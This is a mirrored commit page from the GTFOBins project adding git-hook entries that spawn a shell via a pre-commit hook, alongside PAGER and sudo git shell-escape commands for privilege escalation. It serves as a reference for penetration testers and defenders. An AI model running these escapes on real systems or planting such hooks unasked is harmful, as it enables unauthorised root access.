mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add git hooks shell
Closes #77 as it provides a working example and a possibly better hook. Thanks to jivex5k <wgehalo@gmail.com> for the initial proposal.
This commit is contained in:
parent
740fa3a44f
commit
15b465d937
@ -6,6 +6,13 @@ functions:
|
||||
code: |
|
||||
git help config
|
||||
!/bin/sh
|
||||
- description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
|
||||
code: |
|
||||
TF=$(mktemp -d)
|
||||
git init "$TF"
|
||||
echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
|
||||
mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
|
||||
git -C "$TF" commit --allow-empty -m x
|
||||
sudo:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
@ -16,6 +23,13 @@ functions:
|
||||
code: |
|
||||
sudo git branch --help config
|
||||
!/bin/sh
|
||||
- description: Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.
|
||||
code: |
|
||||
TF=$(mktemp -d)
|
||||
git init "$TF"
|
||||
echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
|
||||
mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
|
||||
sudo git -C "$TF" commit --allow-empty -m x
|
||||
limited-suid:
|
||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user